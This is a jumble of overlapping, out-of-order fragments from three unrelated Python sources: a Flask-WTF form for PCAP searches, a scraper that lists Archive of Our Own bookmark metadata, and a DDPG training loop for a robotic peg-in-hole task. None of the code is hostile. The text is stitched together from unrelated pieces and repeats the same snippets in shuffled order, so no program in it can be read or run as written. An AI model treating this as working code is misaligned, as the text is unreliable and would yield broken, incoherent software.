\"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding", "= StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID", "<filename>forms.py from flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators", "import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\"", "\"The Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30),", "# The form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm):", "PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id", "validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must" ]
[ "with the number of pages of bookmarks there are. Word counts are not", "there are. Word counts are not added for external bookmarks. This prints to", "{ \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for", "fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\")", "note based on that. You can delete that and your own other extra", "in a collection on Archive of Our Own and creates a spreadsheet. It", "standard output and should be redirected to a file. Lines 54-57 search for", "to a file. Lines 54-57 search for if a particular series is linked", "requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES", "= \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10)", "blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string", "in the series) and add a note based on that. You can delete", "Lines 54-57 search for if a particular series is linked (i.e. the fic", "import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES =", "DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author", "prints to standard output and should be redirected to a file. Lines 54-57", "if words is None: words = \"\" else: words = words.string if \"/series/1722145\"", "to include the ?page= part) replace [user] in HEADERS with your username replace", "= words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes =", "HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def", "range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup =", "haven't tried it. To use: replace BOOKMARKS with the URL that you want", "# Author is None for non-AO3 fics, since they're text and not links", "time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15", "To use: replace BOOKMARKS with the URL that you want to summarize (be", "if a particular series is linked (i.e. the fic is in the series)", "to standard output and should be redirected to a file. Lines 54-57 search", "author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else:", "added for external bookmarks. This prints to standard output and should be redirected", "notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\"", "URL that you want to summarize (be sure to include the ?page= part)", "author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if", "series) and add a note based on that. You can delete that and", "of Our Own and creates a spreadsheet. It will likely work for a", "PAGES = 15 DEBUG = False def main(): for p in range(1, PAGES+1):", "non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\") if author", "else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ ==", "and not links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\",", "It will likely work for a user's bookmark's but I haven't tried it.", "= \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG =", "author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words =", "\"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None:", "notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ == '__main__':", "= \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ == '__main__': main()", "a collection on Archive of Our Own and creates a spreadsheet. It will", "str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words,", "you want to summarize (be sure to include the ?page= part) replace [user]", "counts are not added for external bookmarks. This prints to standard output and", "bookmarks there are. Word counts are not added for external bookmarks. This prints", "about the bookmarks in a collection on Archive of Our Own and creates", "of bookmarks there are. Word counts are not added for external bookmarks. This", "blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title", "spreadsheet. It will likely work for a user's bookmark's but I haven't tried", "str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb", "are. Word counts are not added for external bookmarks. This prints to standard", "tried it. To use: replace BOOKMARKS with the URL that you want to", "for external bookmarks. This prints to standard output and should be redirected to", "work for a user's bookmark's but I haven't tried it. To use: replace", "= blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words =", "I haven't tried it. To use: replace BOOKMARKS with the URL that you", "words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words", "notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes))", "fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string", "\"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for p in", "?page= part) replace [user] in HEADERS with your username replace PAGES with the", "for if a particular series is linked (i.e. the fic is in the", "bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = {", "\"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False", "= { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main():", "= 15 DEBUG = False def main(): for p in range(1, PAGES+1): link", "''' This downloads metadata about the bookmarks in a collection on Archive of", "a particular series is linked (i.e. the fic is in the series) and", "output and should be redirected to a file. Lines 54-57 search for if", "Author is None for non-AO3 fics, since they're text and not links author", "= blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author =", "other extra notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS", "if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string #", "username replace PAGES with the number of pages of bookmarks there are. Word", "series is linked (i.e. the fic is in the series) and add a", "from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS =", "the fic is in the series) and add a note based on that.", "in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author,", "= \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev", "if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number,", "the series) and add a note based on that. You can delete that", "(i.e. the fic is in the series) and add a note based on", "to summarize (be sure to include the ?page= part) replace [user] in HEADERS", "a note based on that. You can delete that and your own other", "bookmarks in a collection on Archive of Our Own and creates a spreadsheet.", "creates a spreadsheet. It will likely work for a user's bookmark's but I", "soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics:", "links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else:", "collection on Archive of Our Own and creates a spreadsheet. It will likely", "should be redirected to a file. Lines 54-57 search for if a particular", "for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link,", "linked (i.e. the fic is in the series) and add a note based", "number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics,", "None: words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes", "def main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r", "words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\"", "will likely work for a user's bookmark's but I haven't tried it. To", "else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else:", "summarize (be sure to include the ?page= part) replace [user] in HEADERS with", "replace PAGES with the number of pages of bookmarks there are. Word counts", "that. You can delete that and your own other extra notes. ''' from", "redirected to a file. Lines 54-57 search for if a particular series is", "None for non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\")", "print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is", "= blurb.h4.a.string # Author is None for non-AO3 fics, since they're text and", "a file. Lines 54-57 search for if a particular series is linked (i.e.", "of pages of bookmarks there are. Word counts are not added for external", "can delete that and your own other extra notes. ''' from bs4 import", "in HEADERS with your username replace PAGES with the number of pages of", "it. To use: replace BOOKMARKS with the URL that you want to summarize", "requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb", "and add a note based on that. You can delete that and your", "BOOKMARKS with the URL that you want to summarize (be sure to include", "want to summarize (be sure to include the ?page= part) replace [user] in", "(be sure to include the ?page= part) replace [user] in HEADERS with your", "is None for non-AO3 fics, since they're text and not links author =", "fic is in the series) and add a note based on that. You", "15 DEBUG = False def main(): for p in range(1, PAGES+1): link =", "link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\")", "Our Own and creates a spreadsheet. It will likely work for a user's", "import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" }", "''' from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS", "that and your own other extra notes. ''' from bs4 import BeautifulSoup import", "the URL that you want to summarize (be sure to include the ?page=", "PAGES with the number of pages of bookmarks there are. Word counts are", "not links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip()", "author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words =", "= requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for", "= blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics, since", "print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for", "class_=\"words\") if words is None: words = \"\" else: words = words.string if", "= BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics", "based on that. You can delete that and your own other extra notes.", "None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\")", "print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None", "\"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title,", "the ?page= part) replace [user] in HEADERS with your username replace PAGES with", "is linked (i.e. the fic is in the series) and add a note", "python3 ''' This downloads metadata about the bookmarks in a collection on Archive", "HEADERS with your username replace PAGES with the number of pages of bookmarks", "not added for external bookmarks. This prints to standard output and should be", "= BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if", "} PAGES = 15 DEBUG = False def main(): for p in range(1,", "bookmark's but I haven't tried it. To use: replace BOOKMARKS with the URL", "<reponame>quihi/fanfiction #!/usr/bin/env python3 ''' This downloads metadata about the bookmarks in a collection", "and creates a spreadsheet. It will likely work for a user's bookmark's but", "number of pages of bookmarks there are. Word counts are not added for", "are not added for external bookmarks. This prints to standard output and should", "words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes", "bookmarks. This prints to standard output and should be redirected to a file.", "== None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\",", "text and not links author = blurb.find(rel=\"author\") if author == None: author =", "#!/usr/bin/env python3 ''' This downloads metadata about the bookmarks in a collection on", "blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is", "is None: words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb):", "54-57 search for if a particular series is linked (i.e. the fic is", "with the URL that you want to summarize (be sure to include the", "You can delete that and your own other extra notes. ''' from bs4", "for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\")", "\"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\"", "search for if a particular series is linked (i.e. the fic is in", "the bookmarks in a collection on Archive of Our Own and creates a", "BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG:", "your username replace PAGES with the number of pages of bookmarks there are.", "blurb.h4.a.string # Author is None for non-AO3 fics, since they're text and not", "and should be redirected to a file. Lines 54-57 search for if a", "that you want to summarize (be sure to include the ?page= part) replace", "sure to include the ?page= part) replace [user] in HEADERS with your username", "Word counts are not added for external bookmarks. This prints to standard output", "part) replace [user] in HEADERS with your username replace PAGES with the number", "the number of pages of bookmarks there are. Word counts are not added", "your own other extra notes. ''' from bs4 import BeautifulSoup import requests import", "in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup", "BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\"", "main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r =", "words is None: words = \"\" else: words = words.string if \"/series/1722145\" in", "and your own other extra notes. ''' from bs4 import BeautifulSoup import requests", "BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics =", "on that. You can delete that and your own other extra notes. '''", "use: replace BOOKMARKS with the URL that you want to summarize (be sure", "title = blurb.h4.a.string # Author is None for non-AO3 fics, since they're text", "\"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if", "words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes =", "extra notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS =", "pages of bookmarks there are. Word counts are not added for external bookmarks.", "print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3", "This downloads metadata about the bookmarks in a collection on Archive of Our", "DEBUG = False def main(): for p in range(1, PAGES+1): link = BOOKMARKS", "downloads metadata about the bookmarks in a collection on Archive of Our Own", "user's bookmark's but I haven't tried it. To use: replace BOOKMARKS with the", "replace BOOKMARKS with the URL that you want to summarize (be sure to", "\"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\")", "own other extra notes. ''' from bs4 import BeautifulSoup import requests import time", "since they're text and not links author = blurb.find(rel=\"author\") if author == None:", "author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author", "else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words", "\"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for p", "include the ?page= part) replace [user] in HEADERS with your username replace PAGES", "= author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\"", "a spreadsheet. It will likely work for a user's bookmark's but I haven't", "likely work for a user's bookmark's but I haven't tried it. To use:", "= blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words", "file. Lines 54-57 search for if a particular series is linked (i.e. the", "BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG", "= soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb)", "= False def main(): for p in range(1, PAGES+1): link = BOOKMARKS +", "blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics, since they're", "p in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS)", "for non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\") if", "import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\":", "if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words", "Own and creates a spreadsheet. It will likely work for a user's bookmark's", "external bookmarks. This prints to standard output and should be redirected to a", "+ str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark", "This prints to standard output and should be redirected to a file. Lines", "Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__", "False def main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p)", "r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\")", "on Archive of Our Own and creates a spreadsheet. It will likely work", "particular series is linked (i.e. the fic is in the series) and add", "headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in", "for a user's bookmark's but I haven't tried it. To use: replace BOOKMARKS", "with your username replace PAGES with the number of pages of bookmarks there", "metadata about the bookmarks in a collection on Archive of Our Own and", "a user's bookmark's but I haven't tried it. To use: replace BOOKMARKS with", "add a note based on that. You can delete that and your own", "delete that and your own other extra notes. ''' from bs4 import BeautifulSoup", "PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text,", "soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\")", "replace [user] in HEADERS with your username replace PAGES with the number of", "blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number", "is in the series) and add a note based on that. You can", "be redirected to a file. Lines 54-57 search for if a particular series", "but I haven't tried it. To use: replace BOOKMARKS with the URL that", "fics, since they're text and not links author = blurb.find(rel=\"author\") if author ==", "in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title =", "blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words = words.string", "group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number =", "Archive of Our Own and creates a spreadsheet. It will likely work for", "they're text and not links author = blurb.find(rel=\"author\") if author == None: author", "[user] in HEADERS with your username replace PAGES with the number of pages" ]
[ "sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes", "+= gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) +", "np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2,", "Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly", "episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done is", "t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param", "pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout)", "mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py import", "if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize()", "np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = []", "r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull the pegs", "\"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {}", "for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train", "if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') #", "- epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key]", "obs = env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. done", "epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats =", "saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" #", "maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward +=", "= env.step_up() # pull_done, pull_safe = env.pull_up() # True env # # if", "agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >=", "nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('')", "#Simulation env # pull_done, pull_safe = env.pull_up() #True env # # if pull_safe", "logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'),", "[] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = []", "= deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore:", "= env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. done =", "info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action)", "18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time from", "0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2])", "import os import time from collections import deque import pickle import sys from", "in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the model\"\"\"", "= env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env # #", "stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key])", "pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir =", "combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if", "t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" +", "combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return']", "20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay", "= 0. done = False forcement = [] Last_average_reward = 0. Number_episodes =", "== env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done,", "pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env # #", "range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward =", "for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True)", "[] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate", "as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver,", "None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare", "import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env,", "epoch_episodes += 1 # pull_done = False # while pull_done is False and", "epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the", "exceed force!!!') # pull_done = False # while pull_done is False and info:", "[] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show", "saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 #", "if pull_safe is False: # logger.info('Pull up the pegs failed for the exceed", "is False: # logger.info('Pull up the pegs failed for the exceed force!!!') #", "= env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum", "False # while pull_done is False and info: # pull_done, pull_safe = env.step_up()", "rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action", "0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2,", "logging stuff only for a single worker\"\"\" # if rank == 0: #", "batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes", "min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before", "\"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\",", "restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) #", "critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr,", "= agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for", "critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01,", "+ 1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles -", "by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes +=", "# exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout ==", "epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key", "agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q 